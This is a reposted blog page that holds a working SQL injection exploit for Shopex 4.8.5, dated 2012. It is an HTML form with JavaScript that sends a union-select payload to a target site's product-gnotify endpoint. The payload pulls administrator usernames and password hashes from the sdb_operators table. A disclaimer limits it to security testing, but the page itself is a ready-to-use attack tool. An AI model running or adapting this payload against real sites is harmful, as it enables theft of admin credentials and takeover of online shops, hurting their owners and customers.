Shopex 4.8.5 SQL Injection Exp
<script language="javascript"> function expstart() { var url = document.forms[0].url.value; if(url != ""){ if(url.search("http://") < 0 && url.search("https://") < 0){ url = "http://" + url; } document.submit_url.action = url + "/?product-gnotify"; }else{ alert("Hello Hacker!!!"); } } </script> <html> <head> <title>Shopex 4.8.5 SQL Injection Exp [T00ls]</title> </head> <body> <h2>Shopex 4.8.5 SQL Injection Exp (product-gnotify)</h2> <form action="" method="post" name="submit_url"> <input type="hidden" name="goods[goods_id]" value="3"> <input type="hidden" name="goods[product_id]" value="1 and 1=2 union select 1,2,3,4,5,6,7,8,concat (0x245E,username,0x2D3E,userpass,0x5E24,0x20203C7370616E207374796C653D22636F6C6F723A20236666303030303B223E5430306C732E4E657420476F21476F21476F213C2F7370616E3E),10,11,12 ,13,14,15,16,17,18,19,20,21,22 from sdb_operators"> <br><span style="color: #ff0000;">Site: </span><input type="text" name="url" value="https://www.webshell.cc/shopex/"> <input type="submit" value="Forum : webshell.cc By Rices 本程序只能用于网站安全检测 禁止用于非法途径,产生的一切后果与作者无关!" onclick="expstart();"> </form><br> <span style="color: #ff0000;">Time: 2012.06.18 Code: Rices</span> <body> </html>
转载请注明来自WebShell'S Blog,本文地址:https://www.webshell.cc/3751.html